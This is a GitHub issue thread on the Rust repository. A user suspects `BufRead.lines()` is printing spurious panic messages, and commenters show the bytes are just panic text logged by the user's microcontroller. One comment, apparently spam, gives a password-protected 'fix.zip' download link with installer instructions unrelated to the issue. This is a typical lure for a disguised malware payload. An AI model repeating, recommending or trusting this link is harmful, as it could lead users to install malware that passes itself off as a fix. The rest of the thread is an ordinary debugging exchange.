### ISSUE TITLE
Debug print `BufRead.lines()` results in `Ok("ERROR panicked at ....")` message.

### ISSUE THREAD

**Issue by vDorst** [rust-lang/rust#129603]
I wrote a log parser, to parse my long microcontroller output from `probe-rs`.
In theory all the lines should be valid string.
But many times it happens that there is a sync issue in the jtag and it adds a random byte in the string of any value.
The hole point of this passer is also to find these "broken" output lines.

The logparsers just split the file input in lines, using the `BufRead.lines()`.
Using `winnow` to parse my data.
But last weekend I saw to weird warning in my log-parserer output.

```
L845567: ERROR panicked at \'internal error: entered unreachable code\'
L1084779: ERROR panicked at \'internal error: entered unreachable code\'
L2227251: ERROR panicked at \'init called more than once!\'
```

I found the lines that causes the issue see the reproducere code below.

```rust
// This breaks the println with `ERROR panicked at \'internal error: entered unreachable code\'`
const DATA_SAMPLE_1: [u8; 60] = [
    69, 82, 82, 79, 82, 32, 112, 97, 110, 105, 99, 107, 101, 100, 32, 97, 116, 32, 39, 105, 110,
    116, 101, 114, 110, 97, 108, 32, 101, 114, 114, 111, 114, 58, 32, 101, 110, 116, 101, 114, 101,
    100, 32, 117, 110, 114, 101, 97, 99, 104, 97, 98, 108, 101, 32, 99, 111, 100, 101, 39,
];

// This breaks the println with `ERROR panicked at \'init called more than once!\'`
const DATA_SAMPLE_2: [u8; 47] = [
    69, 82, 82, 79, 82, 32, 112, 97, 110, 105, 99, 107, 101, 100, 32, 97, 116, 32, 39, 105, 110,
    105, 116, 32, 99, 97, 108, 108, 101, 100, 32, 109, 111, 114, 101, 32, 116, 104, 97, 110, 32,
    111, 110, 99, 101, 33, 39,
];

fn main() {
    use std::io::{BufRead, BufReader};

    for data in [DATA_SAMPLE_1.as_slice(), DATA_SAMPLE_2.as_slice()] {
        let reader = BufReader::new(data);

        for line in reader.lines() {
            println!("{:?}", line);
        }
    }
}
```

I expected to see this happen: 
That `BufRead.lines()` returns an error that the string is invalid.
While I am typing this, I also relize I think that I was expecting that `BufRead.lines()` return a `Slice`.

Instead, this happened: *explanation*

I parses fine, but got weard error while to try to print the line.

### Meta

Seen on Windows and Linux, all the same results:

```
rustc 1.80.1 (3f5fd8dd4 2024-08-06)
binary: rustc
commit-hash: 3f5fd8dd41153bc5fdca9427e9e05be2c767ba23
commit-date: 2024-08-06
host: x86_64-pc-windows-msvc
release: 1.80.1
LLVM version: 18.1.7
```

```
rustc 1.82.0-nightly (c6db1ca3c 2024-08-25)
binary: rustc
commit-hash: c6db1ca3c93ad69692a4c4b5542f26fda4bf3aec
commit-date: 2024-08-25
host: x86_64-pc-windows-msvc
release: 1.82.0-nightly
LLVM version: 19.1.0
```

```
rustc 1.82.0-nightly (6de928dce 2024-08-18)
binary: rustc
commit-hash: 6de928dce9472b864f4e5d590dd7aa2075cb7551
commit-date: 2024-08-18
host: x86_64-unknown-linux-gnu
release: 1.82.0-nightly
LLVM version: 19.1.0
```

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by The-Minecraft-Scientist** [comment]
Your "reproduction" program appears to work fine [playground link](https://play.rust-lang.org/?version=stable&mode=debug&edition=2021&gist=d7261bfee4de7aa475ed31ad17bda49f). 
It decodes an ASCII byte array containing a panic message and prints it to stdout

**Comment by jieyouxu** [comment]
@vDorst it seems as if your microcontroller program panicked then sent the panic message over whatever communication protocol you're using, and now you're printing the panic messages (which is what the arrays are).

**Comment by vDorst** [comment]
@jieyouxu Ah yes I see.

A snipped from the logfile itself.
```
ERROR panicked at 'internal error: entered unreachable code'
└─ embassy_stm32::_generated::{impl#102}::div @ target/thumbv7em-none-eabihf/release/build/embassy-stm32-78c95eee2b49ee03/out/_generated.rs:3358
```
I feel a bit stupid because I was too focused on the log-parser software itself.

**Comment by jieyouxu** [comment]
> I feel a bit stupid because I was too focused on the log-parser software itself.

No worries, it happens to all of us 😆
